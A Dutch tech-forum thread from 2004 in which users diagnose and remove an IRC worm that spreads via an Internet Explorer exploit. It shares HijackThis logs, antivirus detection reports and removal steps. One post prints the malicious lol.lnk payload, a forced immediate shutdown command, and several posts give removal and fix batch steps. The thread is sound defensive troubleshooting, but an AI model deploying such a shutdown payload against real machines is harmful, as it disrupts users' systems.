[IRC-Worms] natalie/volja.net/divx/osama links

woensdag 31 maart 2004 21:58

Blablabla

Klinkt idd als een IRC-trojan... kan je die drie files (lol.bat, lol.lnk en mirc.exe) eens gezipt naar mij toesturen (mailadres: zie profile)?

Virussen? Scan ze hier!

Acties:

Verwijderd

Zou je de desbetreffende files eens naar me kunnen sturen?
Zie sig voor mail(s).

woensdag 31 maart 2004 21:59

Acties:

Phuncz

ico_sphere by Matthew Divito

Hier ook. Draait ondertussen Symantec, op zoek naar het wormpje. Het zit ook in c:\windows\system32\notepad.exe, dat is een fake dropper. Even deleten (start --> run --> cmd)

woensdag 31 maart 2004 22:04

Acties:

woensdag 31 maart 2004 22:08

Pomdiedom

Topicstarter

Ja, daar kwam ik dus ook net achter... ik wil hijjackthis log openen en hij start een of ander progje... mirc.exe leek het. Hieronder toch nog even de hijackthis log, ik zal zo die notpad.exe ff proberen te deleten.

Willen jullie nog die bestanden hebben? Ik zal ze iig even opslaan ergens.

Ik heb trwouens al SpyBot en Ad Aware gedraaid en die vonden beiden dus nix.

code:

Logfile of HijackThis v1.97.7
Scan saved at 21:55:47, on 31-3-2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Logitech\MouseWare\system\em_exec.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Symantec\Norton Ghost 2003\GhostStartTrayApp.exe
C:\Program Files\Messenger Plus! 2\MsgPlus.exe
C:\PROGRA~1\T-Media\MMHotKey.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\WINDOWS\System32\drivers\CDAC11BA.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\PROGRA~1\Symantec\NORTON~1\GHOSTS~2.EXE
C:\WINDOWS\runservice.exe
C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\RivaTuner\RivaTuner.exe
C:\Program Files\Norton SystemWorks\Norton Utilities\NPROTECT.EXE
C:\PROGRA~1\NORTON~1\SPEEDD~1\nopdb.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\WinRAR\WinRAR.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
c:\Windows\Temp\mIRC.exe
C:\Program Files\Internet Explorer\iexplore.exe

d:\temp\Rar$EX42.703\HijackThis.exe

d:\temp\Rar$EX46.313\HijackThis.exe

c:\Windows\Temp\mIRC.exe

R3 - Default URLSearchHook is missing
O1 - Hosts: 212.122.122.1 router
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [GhostStartTrayApp] C:\Program Files\Symantec\Norton Ghost 2003\GhostStartTrayApp.exe
O4 - HKLM\..\Run: [MessengerPlus2] "C:\Program Files\Messenger Plus! 2\MsgPlus.exe"
O4 - HKLM\..\Run: [KE9801] C:\PROGRA~1\T-Media\MMHotKey.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RivaTunerStartupDaemon] "C:\Program Files\RivaTuner\RivaTuner.exe" /S
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MessengerPlus2] "C:\Program Files\Messenger Plus! 2\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - Startup: BELLEN.txt
O4 - Startup: RivaTuner.lnk = C:\Program Files\RivaTuner\RivaTuner.exe
O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
O8 - Extra context menu item: &Download with &DAP - C:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: Add to Ad Hunter - C:\Program Files\MYIE2\config/blacklist.htm
O8 - Extra context menu item: Copy Image Url - C:\WINDOWS\WEB\grabimageurl.htm
O8 - Extra context menu item: Download &all with DAP - C:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Trace (HKLM)
O9 - Extra 'Tools' menuitem: VisualRoute Trace (HKLM)
O9 - Extra 'Tools' menuitem: Sun Java Console (HKLM)
O9 - Extra button: Research (HKLM)
O9 - Extra button: Zend Studio Toolbar (HKLM)
O9 - Extra 'Tools' menuitem: Zend Studio (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {023A3744-EA13-4C8A-8B23-ABF98974A9F5} - http://www.gunbound.com/joyonpack.cab
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {26CBF141-7D0F-46E1-AA06-718958B6E4D2} - http://download.ebay.com/turbo_lister/NL/install.cab
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab
O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://dev-www.fileplanet.com/fpdlmgr/cabs/FPDC_1_0_0_35.cab
O16 - DPF: {3E68E405-C6DE-49FF-83AE-41EE9F4C36CE} (Office Update Installation Engine) - http://office.microsoft.com/officeupdate/content/opuc.cab
O16 - DPF: {54B52E52-8000-4413-BD67-FC7FE24B59F2} - http://files.ea.com/downloads/rtpatch/v2/EARTPX.cab
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} - http://207.188.7.150/141f1205a1489b798901/netzip/RdxIE601.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2003120501/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab
O16 - DPF: {917623D1-D8E5-11D2-BE8B-00104B06BDE3} - http://camera1.dsnl.net./activex/AxisCamControl.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37937.6184143519
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{63484718-A3D3-4A9B-9635-C51FAC1F4A7F}: NameServer = 194.109.6.66,194.109.9.99
O17 - HKLM\System\CS1\Services\Tcpip\..\{63484718-A3D3-4A9B-9635-C51FAC1F4A7F}: NameServer = 193.78.240.12
O17 - HKLM\System\CS2\Services\Tcpip\..\{63484718-A3D3-4A9B-9635-C51FAC1F4A7F}: NameServer = 194.109.6.66,194.109.9.99
O17 - HKLM\System\CS3\Services\Tcpip\..\{63484718-A3D3-4A9B-9635-C51FAC1F4A7F}: NameServer = 194.109.6.66,194.109.9.99

Edit: even een stel mirc.exe dingen eruit gehaald..

[ Voor 78% gewijzigd door Verwijderd op 31-03-2004 22:08 ]

"True skill is when luck becomes a habit"
SWIS

Acties:

woensdag 31 maart 2004 22:08

Blablabla

Ja, ik wil die files nog wel hebben

Maar je hebt een leuk Hijack-logje

Hoort die SOUNDMAN.EXE spullen erop thuis? Ken ik niet... en al die cabs in de O16-sectie... hoort dat daar allemaal wel? Vooral die op regel 968 ziet er qua locatie (geen URL, alleen IP) wel erg verdacht uit.

Virussen? Scan ze hier!

Acties:

Verwijderd

Ik heb de files inmiddels, dus niemand hoeft ze meer te sturen..
Het is nieuwe zut iig.

woensdag 31 maart 2004 22:11

Acties:

woensdag 31 maart 2004 22:12

Verwijderd schreef op 31 maart 2004 @ 22:08:
Ik heb de files inmiddels, dus niemand hoeft ze meer te sturen..
Het is nieuwe zut iig.

Nieuw in de zin dat ze alleen via heuristics worden herkend of flagt KAV deze bestanden op de normale mannier.

Acties:

woensdag 31 maart 2004 22:15

Wis de map C:\Windows\Temp [eventueel in Safe Mode als je er niet bij kan omdat die mirc.exe geopend is]
Zou het IMO moeten fixen

"Religion is an insult to human dignity. With or without it you would have good people doing good things and evil people doing evil things. But for good people to do evil things, that takes religion." - Steven Weinberg

Acties:

woensdag 31 maart 2004 22:17

Pomdiedom

Topicstarter

0xDEADBEEF schreef op 31 maart 2004 @ 22:12:
Wis de map C:\Windows\Temp [eventueel in Safe Mode als je er niet bij kan omdat die mirc.exe geopend is]
Zou het IMO moeten fixen

Als je de startpost had gelezen had je gezien dat ik dat al gedaan had

Edit: thnx voor de edit, had neit door dat het zo veel was, lang leve Safe mode resolutions

[ Voor 14% gewijzigd door UltimateB op 31-03-2004 22:16 ]

"True skill is when luck becomes a habit"
SWIS

Acties:

Verwijderd

Kleine titeledit..

KAV flagt de IRC-Worm an sich niet, site lijkt off te zijn, verwacht dat een Psyme script gebruikt is, de kans is dan érg groot dat dat script met generic sig wel gedetecteerd wordt/werd.

woensdag 31 maart 2004 22:18

Acties:

woensdag 31 maart 2004 22:20

Pomdiedom

Topicstarter

wildhagen schreef op 31 maart 2004 @ 22:08:
Ja, ik wil die files nog wel hebben

Maar je hebt een leuk Hijack-logje

Hoort die SOUNDMAN.EXE spullen erop thuis? Ken ik niet... en al die cabs in de O16-sectie... hoort dat daar allemaal wel? Vooral die op regel 968 ziet er qua locatie (geen URL, alleen IP) wel erg verdacht uit.

Ik mail het straks even, is op deze manier niet te doen... En soundman is voor men ac97. Kzal even kijken of ik erachter kan komen wat dat op relel 968 is.

"True skill is when luck becomes a habit"
SWIS

Acties:

woensdag 31 maart 2004 22:24

Blablabla

Ultimateb schreef op 31 maart 2004 @ 22:18:
[...]

Ik mail het straks even, is op deze manier niet te doen... En soundman is voor men ac97. Kzal even kijken of ik erachter kan komen wat dat op relel 968 is.

Tnx.

Ik kende SoundMan.exe niet, vandaar dat ik het even vroeg.

Die regel 968 was voor je edit, het is deze regel:

code:

1	O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} - http://207.188.7.150/141f1205a1489b798901/netzip/RdxIE601.cab

Als ik dit op Google zoek lijken alle links richting erg verdacht spul te lijden. Dat i.c.m. het IP ipv een URL maakt het hoogst verdacht iig.

Virussen? Scan ze hier!

Acties:

Phuncz

ico_sphere by Matthew Divito

Een vriend van mij zegt dat hij het probleem opgelost heeft door notepad.exe te wissen in System32 en de 3 files in de temp map in windows. Na reboot bleken ze niet terug te komen.

woensdag 31 maart 2004 22:24

Acties:

woensdag 31 maart 2004 22:25

Peppi Cola

iig replaced ie de notepad.exe in c:\windows\system32 deze vervangen met de notepad.exe uit c:\windows doet de trick naast het removen van die lol.* en de mirc file in je temp map.

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

Acties:

Dextourius

.

Inmiddels heb ik hem ook op mijn pc met menig andere mirc gebruikers.

Ik ben nu aan het scannen met Panda maar ik ben bang dat ie niks gaat vinden..

Hey Corc, versene borc olmaz Maykil bendede yok!

woensdag 31 maart 2004 22:28

Acties:

woensdag 31 maart 2004 22:28

Peppi Cola

Dextourius schreef op 31 maart 2004 @ 22:25:
Inmiddels heb ik hem ook op mijn pc met menig andere mirc gebruikers.

Ik ben nu aan het scannen met Panda maar ik ben bang dat ie niks gaat vinden..

Probeer mijn oplossing heeft iig bij alle leden uit mijn kanalen gewerkt

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

Acties:

woensdag 31 maart 2004 22:30

Pomdiedom

Topicstarter

Is gelukt. Werkt nu weer, inderdaad gewoon notpad.exe en die temp dir weghalen, ik heb die regel die hierboven genoemd werkt ook wegehaald maar weet niet of dat nodig was ;]

Ik mail even die bestandjes Wilhagen.

"True skill is when luck becomes a habit"
SWIS

Acties:

woensdag 31 maart 2004 22:31

Dextourius schreef op 31 maart 2004 @ 22:25:
Inmiddels heb ik hem ook op mijn pc met menig andere mirc gebruikers.

Ik ben nu aan het scannen met Panda maar ik ben bang dat ie niks gaat vinden..

Ik denk ook niet dat het nut heeft als Schouw zegt dat het nieuw spul is.

Schouw zou je mij die bestanden kunnen mailen in een zip, dan kan ik kijken of panda deze flagt zo niet dan kan ik die submitten.

Acties:

Victor

Even geheel behulpzaam bedoelt, maar misschien zou je als alternatief voor mIRC eens Klient kunnen gebruiken. Ben zelf na een mIRC worm ook overgestapt en het is echt top!

Geen oplossing voor je probleem, wel een manier om toekomste problemen te voorkomen.

woensdag 31 maart 2004 22:35

Acties:

woensdag 31 maart 2004 22:36

Pomdiedom

Topicstarter

Interesse in de bestanden? Check:

Edit: Ze hebben er lang genoeg gestaan..

[ Voor 61% gewijzigd door Verwijderd op 31-03-2004 22:40 ]

"True skill is when luck becomes a habit"
SWIS

Acties:

woensdag 31 maart 2004 22:36

Peppi Cola

King_Louie schreef op 31 maart 2004 @ 22:31:
Even geheel behulpzaam bedoelt, maar misschien zou je als alternatief voor mIRC eens Klient kunnen gebruiken. Ben zelf na een mIRC worm ook overgestapt en het is echt top!

Geen oplossing voor je probleem, wel een manier om toekomste problemen te voorkomen.

Dit is niet direct een mirc worm maar een ie worm eigenlijk dus een andere irc cliënt levert niet veel op. De pc waar ik dit virus op testte had niet eens mirc maar toch heb je er last van.

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

Acties:

Dextourius

.

Sharkbyte schreef op 31 maart 2004 @ 22:24:
Een vriend van mij zegt dat hij het probleem opgelost heeft door notepad.exe te wissen in System32 en de 3 files in de temp map in windows. Na reboot bleken ze niet terug te komen.

Hey zo is het inderdaad zoals het eruit ziet verdwenen... ik kan notepad weer normaal openen zonder reboot etc en die lol bestanden zijn er ook niet meer.

Hey Corc, versene borc olmaz Maykil bendede yok!

woensdag 31 maart 2004 22:39

Acties:

Verwijderd

@mark: Ja je was weer eens de eerste, had alleen je mail nog niet gezien tot net.

Er wordt alleen gebruik gemaakt van een IE exploit, het 'daadwerkelijke' doet ie via IRC, het is dus een IRC-Worm.

Heeft iemand toevallig nog de source van het gebruikte script? Dat zou ik nml erg graag zien en site lijkt down..

woensdag 31 maart 2004 22:40

Acties:

woensdag 31 maart 2004 22:40

Peppi Cola

Ultimateb schreef op 31 maart 2004 @ 22:35:
Interesse in de bestanden? Check:

[weg]

Een idee voor de volgende keer zet er het wachtwoord virus op.

Quote hem dan ook niet!

[ Voor 21% gewijzigd door Verwijderd op 31-03-2004 22:41 ]

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

Acties:

woensdag 31 maart 2004 22:40

Panda vindt ze inderdaad niet, ik ga ze nu alle files submitten. Bedankt in iedergeval!

Acties:

woensdag 31 maart 2004 22:41

Peppi Cola

Verwijderd schreef op 31 maart 2004 @ 22:39:
@mark: Ja je was weer eens de eerste, had alleen je mail nog niet gezien tot net.

Er wordt alleen gebruik gemaakt van een IE exploit, het 'daadwerkelijke' doet ie via IRC, het is dus een IRC-Worm.

Heeft iemand toevallig nog de source van het gebruikte script? Dat zou ik nml erg graag zien en site lijkt down..

Script kon ik niet te pakken krijgen toen was die site al down, denk overbelast ofzo

Ik ben er wel bijna zeker van dat het om deze exploit heen is gebouwd:
http://seclists.org/lists/bugtraq/2004/Mar/0307.html

En op windows 2003 server werkt die exploit niet althans zoals dit virus het deed.

[ Voor 19% gewijzigd door markvt op 31-03-2004 22:43 ]

van-tilburg.info -=- meka (sega emulator) - Proud MEDION fanclub member - KOPPIG VOLHOUDEN !

Acties:

woensdag 31 maart 2004 22:44

Ultimateb schreef op 31 maart 2004 @ 22:35:
Interesse in de bestanden? Check:

http://www.xs4r

/me Kan je die link even weg _laten halen, voordat er mensen ongewild besmet raken ?
Handig dat je hem zelf erbij kwoot...
Inhoud van die lol.lnk:

code:

1
2
3

C:\WINDOWS\system32\shutdown.exe   % w i n d i r %  - s   - t   0 0   - f      %windir%\system32\shutdown.exe

% w i n d i r % \ s y s t e m 3 2 \ s h u t d o w n . e x e                                                                                 0 -            0 0 0Ø 4 6 }      K=ÚwÈØ lÙ Þ   \ R E G    T R Y \ U S E R \ S - 1 - 5 - 2 1 - 5 7 9 8 9 8 4 1 - 1 3 3 6 6 0 1 8 9 4 - 8 3 9 5 2 2 1 1 5 - 1 0 0 3

Inhoud beetje bijgeknipt/gestript.

[ Voor 6% gewijzigd door Verwijderd op 31-03-2004 22:42 ]

"Religion is an insult to human dignity. With or without it you would have good people doing good things and evil people doing evil things. But for good people to do evil things, that takes religion." - Steven Weinberg

Acties:

woensdag 31 maart 2004 22:50

Blablabla

Hmm, shutdown.exe in die dir? Dat suggereert dat hij alleen werkt in XP en Win2003, aangezien oudere versies die file daar niet standaard hebben staan (wel in de resource kit enzo)....

Virussen? Scan ze hier!

Acties:

woensdag 31 maart 2004 22:53

Schouw ik heb net ook de bestanden getest met de online virusscan van Kasperksy maar die vind niks. Alle 4 de bestanden werden getest als okay, waarbij natuurlijk het vreemde was dat lol.ink uiteindelijk de naam shutdown.exe kreeg van KAV.

Voor alle duidelijkheid heb ik deze link gebruikt: http://www.kaspersky.com/scanforvirus.html

Acties:

woensdag 31 maart 2004 22:56

Pomdiedom

Topicstarter

Dit is dus duidelijk niet een irc worm, weer ff titel aanpassen?

Ik zal ff een kleine removeTool.bat bestandje schrijven en in de TS toevoegen, is misschien niet volledig weg dan maar het is in ieder geval weg genoeg

"True skill is when luck becomes a habit"
SWIS

Acties:

Verwijderd

Dat ding verspreidt zich via IRC afaik, het is dus een IRC-Worm...

waarbij natuurlijk het vreemde was dat lol.ink uiteindelijk de naam shutdown.exe kreeg van KAV.

Open de link eens in een hex-editor en doe dan save as.

woensdag 31 maart 2004 23:01

Acties:

woensdag 31 maart 2004 23:03

Pomdiedom

Topicstarter

Ok, sorry. Zou zich ook kunnen versprijden via links op een andere manier, irc is niet nodig toch?

Btw, moet dat shutdown.exe bestandje ook weg? Anders voeg ik het ff bij de removal

edit:

Hmm, shutdown.rar en shutdown.exe in de system32 folder...

[ Voor 17% gewijzigd door UltimateB op 31-03-2004 23:02 ]

"True skill is when luck becomes a habit"
SWIS

Acties:

woensdag 31 maart 2004 23:50

Blablabla

Shutdown.exe hoort in System32 te staan, als je Windows XP of Windows 2003 draait.

Draai je Windows 9x, NT4, ME of Windows 2000, dan staat hij daar niet by default.

edit: en die .RAR hoort daar (uiteraard) niet te staan.

[ Voor 16% gewijzigd door wildhagen op 31-03-2004 23:04 ]

Virussen? Scan ze hier!

Acties:

Verwijderd

FYI:

Hello, thank you, detected as Worm.IRC.Fedix
Urgent update was started.

Bijna 2 uur nadat ik hem heb gesubmit....beetje tegenvallend imo.

Log:

code:

Report:
\newWorm\lol.bat    is a network worm Worm.IRC.Fedix     0:04:07
\newWorm\lol.bat    object could not be disinfected, execution interrupted by user   0:04:10
\newWorm\mirc.ex    is a network worm Worm.IRC.Fedix     0:04:10
\newWorm\mirc.ex    object could not be disinfected, execution interrupted by user   0:04:13
\newWorm\notepad.exe    packed  UPX  0:04:13
\newWorm\notepad.exe    archive  RAR     0:04:13
\newWorm\notepad.exe\archive comment    OK   0:04:14
\newWorm\notepad.exe\mirc.exe   is a network worm Worm.IRC.Fedix     0:04:14
\newWorm\notepad.exe    object could not be disinfected, execution interrupted by user   0:04:16
\newWorm\shutdown.exe   OK   0:04:16
\newWorm\lol.lnk    OK   0:04:16

[ Voor 69% gewijzigd door Verwijderd op 01-04-2004 00:07 ]

donderdag 1 april 2004 16:56

Acties:

donderdag 1 april 2004 20:22

Gisteren avond heb ik de de bestanden gesubmit en ik kom net thuis en zie in mijn mailbox dat Panda gereageerd heeft. ZIj noemen het TRJ.Shutdown.A en wordt nu direct herkend tijdens het openen van de bepaalde map waar de 4 bestanden in staan.

Toch netjes 22.30 gisteren bestanden verzonden en om 10.00 vanochtend had ik dus al bericht terug met de melding dat deze is meegenomen in de update.

Acties:

donderdag 1 april 2004 20:28

[Ondertitel]

norton gaf bij mij wel aan dat ik op een link met bloodhound exploit klikte, maar hield dat ding niet tegen :x dus nu stuur ik die links ook naar irc, ik heb desbetreffende bestanden nu van hdd verwijdered en die notepad.exe ff gekopierd van windows naar windows\system32 hoop dat ik er nu af ben....

[Signature]

Acties:

Verwijderd

NAV kan die scripts niet blocken..
Dit kan een bug in 2004 versie zijn maar ook een echte designflaw.

NAV is niet bepaald eerste/enige scanner die hier last van heeft btw.

donderdag 1 april 2004 20:35

Acties:

donderdag 1 april 2004 20:39

[Ondertitel]

mjah, ben ik er nu af dan met dat verplaatsen en verwijderen zoals ik dat gedaan heb?

//edit

en wat is eventueel een lichtere, minder systeembronnen gebruikende virusscanner die toch gelijk/beter dan norton is qua beveiliging?

[ Voor 47% gewijzigd door woest85 op 01-04-2004 20:38 ]

[Signature]

Acties:

Verwijderd

woest85 schreef op 01 april 2004 @ 20:35:
en wat is eventueel een lichtere, minder systeembronnen gebruikende virusscanner die toch gelijk/beter dan norton is qua beveiliging?

Lees [rml][ Virusscanners] discussietopic[/rml] eens door.

Reageren mag ook.

donderdag 1 april 2004 20:40

Acties:

donderdag 1 april 2004 20:54

[Ondertitel]

ok, zal ik doen, thnx ik moet namelijk ook nog iets hebben voor een p1 200mmx servertje....

[ Voor 63% gewijzigd door woest85 op 01-04-2004 20:42 ]

[Signature]

Acties:

Verwijderd

Er is trouwens vanavond weer een andere in de omloop.
Weer een link naar een 'jpg' file die gehost wordt op freenet.de
Alleen IE is kwetsbaar afaik..

FYI: It is called "Worm.IRC.Natali".

donderdag 1 april 2004 21:05

Acties:

donderdag 1 april 2004 21:14

[Ondertitel]

mjah, die had ik dus..... zelfde methode om te verwijderen als die eerste?

[Signature]

Acties:

KillerDream

Verwijderd schreef op 01 april 2004 @ 20:54:
Er is trouwens vanavond weer een andere in de omloop.
Weer een link naar een 'jpg' file die gehost wordt op freenet.de
Alleen IE is kwetsbaar afaik..

FYI: It is called "Worm.IRC.Natali".

Ja, die heb ik nu ook.

Wordt er nu een beetje zat van, is nu de 3de in 2 dagen!!!!

donderdag 1 april 2004 21:34

Acties:

HunterPro

ik heb met een beetje gezond verstand, en de symantec scriptblocker, de volledige worm uitgewerkt en uitgepeld hier staan; wil je die hebben, schouw, of was je zelf ook al zo ver ?

(de chm uitgepeld, scriptje er uit, file die die weer downloadt, files die daar weer uitkomen, ben bezig de mirc.exe te disassembleren)

[ Voor 28% gewijzigd door HunterPro op 01-04-2004 21:36 ]

donderdag 1 april 2004 21:56

Acties:

Verwijderd

HunterPro schreef op 01 april 2004 @ 21:34:
ik heb met een beetje gezond verstand, en de symantec scriptblocker

Wat moet je met de(halfwerkende)scriptblocker

Interesting to note: mirc.exe is in bytes precies gelijk aan die van gisteren..

code:

Upload\0.bat    OK   21:54:17
Upload\EXPLOIT.chm  archive  CHM     21:54:17
Upload\EXPLOIT.chm/stream   is infected with a virus TrojanDownloader.Script.JS.Nowed    21:54:17
Upload\EXPLOIT.chm  object could not be disinfected, execution interrupted by user   21:54:20
Upload\fix.bat  OK   21:54:20
Upload\lol.lnk  OK   21:54:20
Upload\mirc.exe is a network worm Worm.IRC.Natali    21:54:20
Upload\mirc.exe object could not be disinfected, execution interrupted by user   21:54:20

donderdag 1 april 2004 23:59

Acties:

Okyah

wespachterrrrrfilm..

Is een file genaamd fix.bat.lnkStartup... Ook iets wat hierbij hoort

Heb die Natalie versie en heb in safe mode de bat gedraaid uit de startpost, maar heb nu dit bestand gevonden.
Geen idee of het nu opgelost is dus

Alone at last
Just nostalgia and I
We were sure to have a blast

vrijdag 2 april 2004 00:08

Acties:

Verwijderd

Check even m'n detectielog, daar staan een aantal gedropte files in.
Verder wordt C:\WINDOWS\system32\notepad.exe overschreven door de malware.
fix.bat is trouwens ook nog echt een fix.

code:

1 2	copy c:\windows\notepad.exe c:\windows\system32 del c:\fix.bat

Na een reboot zou het dan gefixt zijn.(Mits 0.bat ook gerund is)

vrijdag 2 april 2004 00:15

Acties:

Okyah

wespachterrrrrfilm..

Ik begrijp het geloof ik niet helemaal

Maar ik ga nu proberen om op starten in safe mode, vervolgens nog eens die notepad te verwisselen en dan fix.bat te verwijderen (die ik overigens nu niet zie). Ik heb gezocht op alle andere files die je noemt, maar die kan ik niet vinden... Nja, ik ga verder proberen. Dank ieg

Alone at last
Just nostalgia and I
We were sure to have a blast

vrijdag 2 april 2004 00:20

Acties:

Verwijderd

Okyah schreef op 02 april 2004 @ 00:15:
Ik begrijp het geloof ik niet helemaal Maar ik ga nu proberen om op starten in safe mode, vervolgens nog eens die notepad te verwisselen en dan fix.bat te verwijderen (die ik overigens nu niet zie). Ik heb gezocht op alle andere files die je noemt, maar die kan ik niet vinden... Nja, ik ga verder proberen. Dank ieg

Kijk even naar de inhoud van de batfile(de code die ik heb neergekwakt)..
Daar staat toch dat fix.bat verwijderd wordt.

_{En het ook niet nodig vinden om een niet-IE browser te gebruiken ook..}

vrijdag 2 april 2004 07:31

Acties:

Okyah

wespachterrrrrfilm..

Verwijderd schreef op 02 april 2004 @ 00:20:
[...]
_{En het ook niet nodig vinden om een niet-IE browser te gebruiken ook..}

Zal er nog eens over denken FF te gebruiken Schouw

KAV lijkt het nu btw te pakken, want ik kreeg een melding van een infected file op d:/ in m'n temp internet files...

Alone at last
Just nostalgia and I
We were sure to have a blast

vrijdag 2 april 2004 10:02

Acties:

Verwijderd

Okyah schreef op 02 april 2004 @ 07:31:
[...]

Zal er nog eens over denken FF te gebruiken Schouw

KAV lijkt het nu btw te pakken, want ik kreeg een melding van een infected file op d:/ in m'n temp internet files...

Detectie was er al enkele uren voordat je besmet raakte Okyah, dus helemaal toen je KAV installde.

zaterdag 3 april 2004 17:00

Acties:

zaterdag 3 april 2004 17:04

Verwijderd schreef op 31 maart 2004 @ 23:50:
FYI:
[...]

Bijna 2 uur nadat ik hem heb gesubmit....beetje tegenvallend imo.

Log:

code:

Report:
\newWorm\lol.bat    is a network worm Worm.IRC.Fedix     0:04:07
\newWorm\lol.bat    object could not be disinfected, execution interrupted by user   0:04:10
\newWorm\mirc.ex    is a network worm Worm.IRC.Fedix     0:04:10
\newWorm\mirc.ex    object could not be disinfected, execution interrupted by user   0:04:13
\newWorm\notepad.exe    packed  UPX  0:04:13
\newWorm\notepad.exe    archive  RAR     0:04:13
\newWorm\notepad.exe\archive comment    OK   0:04:14
\newWorm\notepad.exe\mirc.exe   is a network worm Worm.IRC.Fedix     0:04:14
\newWorm\notepad.exe    object could not be disinfected, execution interrupted by user   0:04:16
\newWorm\shutdown.exe   OK   0:04:16
\newWorm\lol.lnk    OK   0:04:16

Klopt, ook via de submit-online scan.

@ Schouw: flagged F-Secure m al ? Volgens mij niet..

"Religion is an insult to human dignity. With or without it you would have good people doing good things and evil people doing evil things. But for good people to do evil things, that takes religion." - Steven Weinberg

Acties:

Verwijderd

0xDEADBEEF schreef op 03 april 2004 @ 17:00:
[...]

Klopt, ook via de submit-online scan.

@ Schouw: flagged F-Secure m al ? Volgens mij niet..

Ik neem aan dat ze in de tussentijd al eens hebben geupdate, dus ja.
Ze gebruiken immers een KAV-engine met bijbehorende bases.

zaterdag 3 april 2004 17:15

Acties:

blix

Verdomme, heb nu dus ook een IRC worm, alleen is dus niet deze, iemand enig idee hoe ik dit in godsnaam kan oplossen?

zaterdag 3 april 2004 17:17

Acties:

Verwijderd

Als dit weer een nieuwe is, zou ik érg graag de link richting(waarschijnlijk)jpg willen hebben en eventueel de desbetreffende files..

Zou je die kunnen mailen? Zie sig voor mail.
